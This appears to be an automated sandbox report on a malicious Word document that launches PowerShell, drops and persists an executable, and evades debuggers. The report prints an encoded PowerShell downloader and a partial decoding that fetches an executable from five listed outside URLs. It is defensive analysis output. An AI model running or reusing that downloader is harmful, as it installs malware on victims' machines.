Source: C:\Users\user\936.exe	Code function: 4_1_0040750B push cs; ret		4_1_0040750D
Source: C:\Users\user\936.exe	Code function: 4_1_00406F28 push ds; retf		4_1_00406F2C
Source: C:\Users\user\936.exe	Code function: 4_1_00405987 push es; iretd		4_1_00405988
Source: C:\Users\user\936.exe	Code function: 5_1_0040F22E push ebp; ret		5_1_0040F22F
Source: C:\Users\user\936.exe	Code function: 5_1_0040E95B push eax; ret		5_1_0040E95D
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_0040E95B push eax; ret		7_1_0040E95D
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_0040F22E push ebp; ret		7_1_0040F22F

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\watsonbegin.exe

Executable created and started: C:\Windows\System32\watsonbegin.exe

Jump to behavior

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\936.exe

Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\936.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\936.exe

PE file moved: C:\Windows\System32\watsonbegin.exe

Jump to behavior

Boot Survival:

Drops PE files to the user root directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\936.exe

Jump to dropped file

Contains functionality to start windows services

Source: C:\Users\user\936.exe

Code function: 5_2_0040C134 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,

5_2_0040C134

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\936.exe

File opened: C:\Windows\system32\watsonbegin.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49223

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\936.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\System32\watsonbegin.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Checks the free space of harddrives

Source: C:\Users\user\936.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Contains functionality to enumerate running services

Source: C:\Users\user\936.exe

Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,

5_2_0040BE5A

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\936.exe

API coverage: 7.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3588	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\936.exe TID: 3716	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\watsonbegin.exe TID: 3936	Thread sleep time: -60000s >= -30000s			Jump to behavior

Program exit points

Source: C:\Users\user\936.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\936.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\watsonbegin.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\watsonbegin.exe	API call chain: ExitProcess graph end node

Queries a list of all running processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\936.exe

Code function: 4_2_004016FD LoadLibraryA,GetProcAddress,

4_2_004016FD

Contains functionality to read the PEB

Source: C:\Users\user\936.exe	Code function: 4_2_00409CEB mov eax, dword ptr fs:[00000030h]		4_2_00409CEB
Source: C:\Users\user\936.exe	Code function: 4_2_00401285 mov eax, dword ptr fs:[00000030h]		4_2_00401285
Source: C:\Users\user\936.exe	Code function: 4_1_00409CEB mov eax, dword ptr fs:[00000030h]		4_1_00409CEB
Source: C:\Users\user\936.exe	Code function: 5_2_00409CEB mov eax, dword ptr fs:[00000030h]		5_2_00409CEB
Source: C:\Users\user\936.exe	Code function: 5_2_00401285 mov eax, dword ptr fs:[00000030h]		5_2_00401285
Source: C:\Users\user\936.exe	Code function: 5_1_00409CEB mov eax, dword ptr fs:[00000030h]		5_1_00409CEB
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00409CEB mov eax, dword ptr fs:[00000030h]		7_1_00409CEB
Source: C:\Windows\System32\watsonbegin.exe	Code function: 7_1_00401285 mov eax, dword ptr fs:[00000030h]		7_1_00401285

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\936.exe

Code function: 4_2_00401485 GetProcessHeap,RtlAllocateHeap,

4_2_00401485

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded $ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus.com/postnewo/RwhvOlZIs/@http://lastminutelollipop.com/wp-admin/aEQlppdlfo/@http://kashmirhackers.com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil.com.br/site/wAKkbOEwy/@http://nottspcrepair.co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBz

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\936.exe

Code function: 4_2_0040CA38 cpuid

4_2_0040CA38

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\936.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\watsonbegin.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Contains functionality to query windows version

Source: C:\Users\user\936.exe

Code function: 4_2_00409CEB GetTickCount,lstrlen,RtlGetVersion,GetNativeSystemInfo,GetTickCount,

4_2_00409CEB

Queries the cryptographic machine GUID

Source: C:\Users\user\936.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior